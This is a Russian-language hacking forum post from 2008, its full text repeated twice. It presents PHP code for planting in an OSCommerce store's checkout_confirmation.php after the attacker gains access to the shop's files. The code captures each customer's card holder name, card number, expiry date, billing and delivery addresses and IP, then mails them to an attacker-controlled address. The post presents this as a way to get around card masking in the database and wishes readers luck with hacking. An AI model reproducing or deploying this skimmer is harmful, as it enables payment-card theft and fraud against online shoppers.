vp$
02.11.2008, 20:10
OSCommerce один из самых популярных движков для онлайн магазинов
в нем есть встоенный модуль для оплаты кредитными картами, который является лакомым куском для хакеров и кардеров
но все чаще встречаются всяческие способы защиты приватных данных, в случае исли злоумышленник все таки получил доступ к базе данных, то остался с носом, вот наглядный пример
http://ipicture.ru/uploads/081102/13581/2A2RRE5X2z.jpg
номер карты закрыт в середине крестиками
именно для таких случаев я написал небольшой код, который будет перехватывать важную информацию
теперь имея доступ к файлам магазина, необходимо найти файл checkout_confirmation.php (он обычно находится в корневой папке шопа) и в ставить следующий код после открывающего тэга body:
<?
error_reporting (0);
$ip_holder = $_SERVER['REMOTE_ADDR'];
$tr_deliv_adr = tep_address_format($order->delivery['format_id'], $order->delivery, 1, ' ', ' ');
$tr_bill_adr = tep_address_format($order->billing['format_id'], $order->billing, 1, ' ', ' ');
$tr_cc_owner = $_POST["cc_owner"];
$tr_cc_number= $_POST["cc_number"];
$tr_cc_expires_month = $_POST["cc_expires_month"];
$tr_cc_expires_year= $_POST["cc_expires_year"];
$info_body = "Delivery Address: ";
$info_body .= $tr_deliv_adr."\n";
$info_body .= "----------------------------------\n";
$info_body .= "Billing Address: ";
$info_body .= $tr_bill_adr."\n";
$info_body .= "----------------------------------\n";
$info_body .= "IP holder: ".$ip_holder."\n";
$info_body .= "CC holder: ".$tr_cc_owner."\n";
$info_body .= "CC num: ".$tr_cc_number."\n";
$info_body .= "EXP: ".$tr_cc_expires_month."/".$tr_cc_expires_year."\n";
mail("your@mail.com",'!!! NEW CC !!!',$info_body,"onlineshop.com\r\n");
?>
теперь после каждой совершенной оплаты кредитной картой, на ваше мыло your@mail.com будет высылаться вся необходимая информация
http://pic.ipicture.ru/uploads/081102/13581/Ph68dDS3da.jpg
P.S. данный код написан под модуль без использования CVV
P.P.S удачи в хеке ;)
в нем есть встоенный модуль для оплаты кредитными картами, который является лакомым куском для хакеров и кардеров
но все чаще встречаются всяческие способы защиты приватных данных, в случае исли злоумышленник все таки получил доступ к базе данных, то остался с носом, вот наглядный пример
http://ipicture.ru/uploads/081102/13581/2A2RRE5X2z.jpg
номер карты закрыт в середине крестиками
именно для таких случаев я написал небольшой код, который будет перехватывать важную информацию
теперь имея доступ к файлам магазина, необходимо найти файл checkout_confirmation.php (он обычно находится в корневой папке шопа) и в ставить следующий код после открывающего тэга body:
<?
error_reporting (0);
$ip_holder = $_SERVER['REMOTE_ADDR'];
$tr_deliv_adr = tep_address_format($order->delivery['format_id'], $order->delivery, 1, ' ', ' ');
$tr_bill_adr = tep_address_format($order->billing['format_id'], $order->billing, 1, ' ', ' ');
$tr_cc_owner = $_POST["cc_owner"];
$tr_cc_number= $_POST["cc_number"];
$tr_cc_expires_month = $_POST["cc_expires_month"];
$tr_cc_expires_year= $_POST["cc_expires_year"];
$info_body = "Delivery Address: ";
$info_body .= $tr_deliv_adr."\n";
$info_body .= "----------------------------------\n";
$info_body .= "Billing Address: ";
$info_body .= $tr_bill_adr."\n";
$info_body .= "----------------------------------\n";
$info_body .= "IP holder: ".$ip_holder."\n";
$info_body .= "CC holder: ".$tr_cc_owner."\n";
$info_body .= "CC num: ".$tr_cc_number."\n";
$info_body .= "EXP: ".$tr_cc_expires_month."/".$tr_cc_expires_year."\n";
mail("your@mail.com",'!!! NEW CC !!!',$info_body,"onlineshop.com\r\n");
?>
теперь после каждой совершенной оплаты кредитной картой, на ваше мыло your@mail.com будет высылаться вся необходимая информация
http://pic.ipicture.ru/uploads/081102/13581/Ph68dDS3da.jpg
P.S. данный код написан под модуль без использования CVV
P.P.S удачи в хеке ;)